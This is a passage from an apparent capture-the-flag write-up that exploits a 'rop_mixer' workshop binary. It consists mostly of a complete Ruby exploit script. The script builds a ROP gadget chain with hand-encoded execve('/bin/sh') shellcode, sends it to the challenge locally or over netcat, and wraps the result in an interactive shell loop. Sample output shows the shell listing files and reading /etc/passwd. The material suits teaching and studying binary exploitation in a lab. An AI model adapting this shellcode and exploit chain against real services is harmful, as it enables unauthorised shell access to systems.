  return master, write, pid
end

m_sp, w_sp, pid_sp = xspawn "./ctf/exploits/binary2_workshop/rop_mixer/rop_mixer"
# OR
m_sp, w_sp, pid_sp = xspawn "nc 127.0.0.1 12349"

Send the exploit string

  w_sp.puts(e)

To make our shell interactive, it does not seem like Ruby has a ready made interact function, but we can implement it ourselves in a few lines of code. We basically just need to select(2) on stdin of the script and stdout of rop_mixer or netcat and shuffle data from one world to the other.

while true do
  rs, _, _ = IO.select([m_sp, $stdin])
  if rs.include?(m_sp) then
    print(m_sp.read_nonblock(100))
  end

  if rs.include?($stdin) then
    w_sp.print($stdin.read_nonblock(100))
  end
end

And that’s it.

Our interactive shell does not have a $PS1 prompt or job control but it is functional enough. In this example I ran ls followed by head /etc/passwd.

†  ruby mixer_exp.rb
nc: using stream socket
WELCOME TO THE ROP MIXER
There are 49 gadgets
GOOD LUCK WITH YOUR GADGETS
TÐ(ÐÐZÐÐÐRÐWÐSÐÐÐ_ÐÐ0Ð]Ð̀Ð ÐÐQÐ8ÐÐUÐÐVÐXÐ^ÐÐYÐ[ÐÐ$ÐPÐEÐÐÐ\Ðls
host.sh
rop_mixer
head /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
news:x:9:13:news:/var/spool/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucp:/bin/false

Below is the full exploit script.

#!/usr/bin/ruby
require 'r2pipe'
require 'pty'

def addr_to_str addr
  # We need to convert from numeric to little Endian string format.
  return (addr & 0xff).chr +
    ((addr >> 8) & 0xff).chr +
    ((addr >> 16) & 0xff).chr +
    ((addr >> 24) & 0xff).chr
end

$gadget_call_eax = addr_to_str 0x080485df
#0x080485df               ffd0  call eax

$gadget_add_esp = addr_to_str 0x0804890c
#0x08048909             83c41c  add esp, 0x1c
#0x0804890c                 5b  pop ebx
#0x0804890d                 5e  pop esi
#0x0804890e                 5f  pop edi
#0x0804890f                 5d  pop ebp
#0x08048910                 c3  ret

def enc s
  #incompatible character encodings: ASCII-8BIT and UTF-8(Encoding::CompatibilityError)
  s.force_encoding(Encoding::ASCII_8BIT)
end

$shell_mov_edi_0xbf10890408 = enc "\xbf\x10\x89\x04\x08"
$shell_call_edi = enc "\xff\xd7"
$shell_mov_ebx_esp_4 = enc "\x8b\x9c\x24\xfc\xff\xff\xff"
$shell_nop = enc "\x90"
$shell_jmp_4 = enc "\xeb\x02"
$shell_jmp_0xa = enc "\xeb\x08"
$shell_add_esp_0x100 = enc "\x81\xc4\x00\x01\x00\x00"
$shell_bin_sh = enc "/bin/sh\x00"
$shell_add_ebx_9 = enc "\x83\xc3\x09"
$shell_mov_eax_0xb = enc "\xb8\x0b\x00\x00\x00"
$shell_xor_ecx_ecx = enc "\x31\xc9"
$shell_xor_edx_edx = enc "\x31\xd2"
$shell_int_0x80 = enc "\xcd\x80"

e = $gadget_add_esp +
  $shell_nop + $shell_nop + $shell_nop +
  $shell_nop + $shell_nop + $shell_nop +
  $shell_nop + $shell_nop + $shell_nop + $shell_nop +
  $shell_nop + $shell_nop + $shell_nop + $shell_nop +
  $shell_jmp_4 +
  $gadget_call_eax +
  $shell_add_esp_0x100 +
  $shell_mov_edi_0xbf10890408 +
  $shell_call_edi +
  $shell_mov_ebx_esp_4 +
  $shell_jmp_0xa +
  $shell_bin_sh +
  $shell_add_ebx_9 +
  $shell_mov_eax_0xb +
  $shell_xor_ecx_ecx +
  $shell_xor_edx_edx +
  $shell_int_0x80

def xspawn cmd
  master, slave = PTY.open
  read, write = IO.pipe
  pid = spawn(cmd, :in=>read, :out=>slave)
  read.close
  slave.close
  return master, write, pid
end

#m_sp, w_sp, pid_sp = xspawn "./ctf/exploits/binary2_workshop/rop_mixer/rop_mixer"
m_sp, w_sp, pid_sp = xspawn "nc 127.0.0.1 12349"
w_sp.puts(e)

while true do
  rs, _, _ = IO.select([m_sp, $stdin])
  if rs.include?(m_sp) then
    print(m_sp.read_nonblock(100))
  end

  if rs.include?($stdin) then
    w_sp.print($stdin.read_nonblock(100))
  end
end